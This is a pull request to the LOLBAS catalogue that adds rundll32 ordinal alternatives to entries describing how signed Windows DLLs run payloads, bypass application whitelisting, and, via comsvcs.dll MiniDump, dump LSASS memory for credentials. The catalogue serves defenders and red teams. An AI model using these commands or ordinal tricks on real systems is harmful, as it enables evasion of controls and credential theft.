### PR TITLE
Adding ordinal alternatives to various LOLScripts (closes #212)

### DIFF
--- a/yml/OSLibraries/Advpack.yml
+++ b/yml/OSLibraries/Advpack.yml
@@ -5,35 +5,35 @@ Author: LOLBAS Team
 Created: 2018-05-25
 Commands:
   - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
-    Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
+    Description: "Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). As an alternative to export name LaunchINFSection, ordinal #46 can be used."
     Usecase: Run local or remote script(let) code through INF file specification.
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,
-    Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
+    Description: "Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). As an alternative to export name LaunchINFSection, ordinal #46 can be used."
     Usecase: Run local or remote script(let) code through INF file specification.
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32.exe advpack.dll,RegisterOCX test.dll
-    Description: Launch a DLL payload by calling the RegisterOCX function.
+    Description: "Launch a DLL payload by calling the RegisterOCX function. As an alternative to export name RegisterOCX, ordinal #12 can be used."
     Usecase: Load a DLL payload.
     Category: Execute
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
-    Description: Launch an executable by calling the RegisterOCX function.
+    Description: "Launch an executable by calling the RegisterOCX function. As an alternative to export name RegisterOCX, ordinal #12 can be used."
     Usecase: Run an executable payload.
     Category: Execute
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
-    Description: Launch command line by calling the RegisterOCX function.
+    Description: "Launch command line by calling the RegisterOCX function. As an alternative to export name RegisterOCX, ordinal #12 can be used."
     Usecase: Run an executable payload.
     Category: Execute
     Privileges: User

--- a/yml/OSLibraries/Desk.yml
+++ b/yml/OSLibraries/Desk.yml
@@ -5,14 +5,14 @@ Author: Hai Vaknin
 Created: 2022-04-21
 Commands:
   - Command: rundll32.exe desk.cpl,InstallScreenSaver C:\temp\file.scr
-    Description: Launch an executable with a .scr extension by calling the InstallScreenSaver function.
+    Description: "Launch an executable with a .scr extension by calling the InstallScreenSaver function. As an alternative to export name InstallScreenSaver, ordinal #7 can be used."
     Usecase: Launch any executable payload, as long as it uses the .scr extension.
     Category: Execute
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr
-    Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.
+    Description: "Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. As an alternative to export name InstallScreenSaver, ordinal #7 can be used."
     Usecase: Launch any executable payload, as long as it uses the .scr extension.
     Category: Execute
     Privileges: User

--- a/yml/OSLibraries/Dfshim.yml
+++ b/yml/OSLibraries/Dfshim.yml
@@ -5,7 +5,7 @@ Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
   - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
-    Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
+    Description: "Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host). As an alternative to export name ShOpenVerbApplication, ordinal #12 can be used."
     Usecase: Use binary to bypass Application whitelisting
     Category: AWL Bypass
     Privileges: User

--- a/yml/OSLibraries/Ieadvpack.yml
+++ b/yml/OSLibraries/Ieadvpack.yml
@@ -5,35 +5,35 @@ Author: LOLBAS Team
 Created: 2018-05-25
 Commands:
   - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
-    Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
+    Description: "Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). As an alternative to export name LaunchINFSection, ordinal #46 can be used."
     Usecase: Run local or remote script(let) code through INF file specification.
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,
-    Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
+    Description: "Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). As an alternative to export name LaunchINFSection, ordinal #46 can be used."
     Usecase: Run local or remote script(let) code through INF file specification.
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
-    Description: Launch a DLL payload by calling the RegisterOCX function.
+    Description: "Launch a DLL payload by calling the RegisterOCX function. As an alternative to export name RegisterOCX, ordinal #12 can be used."
     Usecase: Load a DLL payload.
     Category: Execute
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
-    Description: Launch an executable by calling the RegisterOCX function.
+    Description: "Launch an executable by calling the RegisterOCX function. As an alternative to export name RegisterOCX, ordinal #12 can be used."
     Usecase: Run an executable payload.
     Category: Execute
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"
-    Description: Launch command line by calling the RegisterOCX function.
+    Description: "Launch command line by calling the RegisterOCX function. As an alternative to export name RegisterOCX, ordinal #12 can be used."
     Usecase: Run an executable payload.
     Category: Execute
     Privileges: User

--- a/yml/OSLibraries/Ieframe.yml
+++ b/yml/OSLibraries/Ieframe.yml
@@ -5,8 +5,8 @@ Author: LOLBAS Team
 Created: 2018-05-25
 Commands:
   - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
-    Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
-    Usecase: Load an executable payload by calling a .url file with or without quotes.  The .url file extension can be renamed.
+    Description: Launch an executable payload via proxy through a URL (information) file by calling OpenURL.
+    Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
     Category: Execute
     Privileges: User
     MitreID: T1218.011

--- a/yml/OSLibraries/Pcwutl.yml
+++ b/yml/OSLibraries/Pcwutl.yml
@@ -5,7 +5,7 @@ Author: LOLBAS Team
 Created: 2018-05-25
 Commands:
   - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe
-    Description: Launch executable by calling the LaunchApplication function.
+    Description: "Launch executable by calling the LaunchApplication function. As an alternative to export name LaunchApplication, ordinal #1 can be used."
     Usecase: Launch an executable.
     Category: Execute
     Privileges: User

--- a/yml/OSLibraries/Setupapi.yml
+++ b/yml/OSLibraries/Setupapi.yml
@@ -5,14 +5,14 @@ Author: LOLBAS Team
 Created: 2018-05-25
 Commands:
   - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf
-    Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
+    Description: "Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). As an alternative to export name InstallHinfSection, ordinal #240 can be used."
     Usecase: Run local or remote script(let) code through INF file specification.
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
-    Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
+    Description: "Launch an executable file via the InstallHinfSection function and .inf file section directive. As an alternative to export name InstallHinfSection, ordinal #240 can be used."
     Usecase: Load an executable payload.
     Category: Execute
     Privileges: User

--- a/yml/OSLibraries/Shell32.yml
+++ b/yml/OSLibraries/Shell32.yml
@@ -5,21 +5,21 @@ Author: LOLBAS Team
 Created: 2018-05-25
 Commands:
   - Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll
-    Description: Launch a DLL payload by calling the Control_RunDLL function.
+    Description: "Launch a DLL payload by calling the Control_RunDLL function. As an alternative to export name Control_RunDLL, ordinal #277 can be used."
     Usecase: Load a DLL payload.
     Category: Execute
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
-    Description: Launch an executable by calling the ShellExec_RunDLL function.
+    Description: "Launch an executable by calling the ShellExec_RunDLL function. As an alternative to export name ShellExec_RunDLL, ordinal #572 can be used."
     Usecase: Run an executable payload.
     Category: Execute
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
-    Description: Launch command line by calling the ShellExec_RunDLL function.
+    Description: "Launch command line by calling the ShellExec_RunDLL function. As an alternative to export name ShellExec_RunDLL, ordinal #572 can be used."
     Usecase: Run an executable payload.
     Category: Execute
     Privileges: User

--- a/yml/OSLibraries/Syssetup.yml
+++ b/yml/OSLibraries/Syssetup.yml
@@ -5,14 +5,14 @@ Author: LOLBAS Team
 Created: 2018-05-25
 Commands:
   - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf
-    Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
+    Description: "Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). As an alternative to export name SetupInfObjectInstallAction, ordinal #9 can be used."
     Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window).
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
   - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
-    Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
+    Description: "Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. As an alternative to export name SetupInfObjectInstallAction, ordinal #9 can be used."
     Usecase: Load an executable payload.
     Category: Execute
     Privileges: User

--- a/yml/OSLibraries/comsvcs.yml
+++ b/yml/OSLibraries/comsvcs.yml
@@ -5,7 +5,7 @@ Author: LOLBAS Team
 Created: 2019-08-30
 Commands:
   - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
-    Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
+    Description: "Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. As an alternative to export name MiniDump, ordinal #24 can be used."
     Usecase: Dump Lsass.exe process memory to retrieve credentials.
     Category: Dump
     Privileges: SYSTEM


### PR DESCRIPTION
Not all the DLLs included in the project have a Unicode-specific export, which is required when using ordinals from e.g. cmd.exe/powershell.exe. As such, I have only updated those for which a Unicode-specific export existed, and I could verify to be working in my Windows 11 test lab.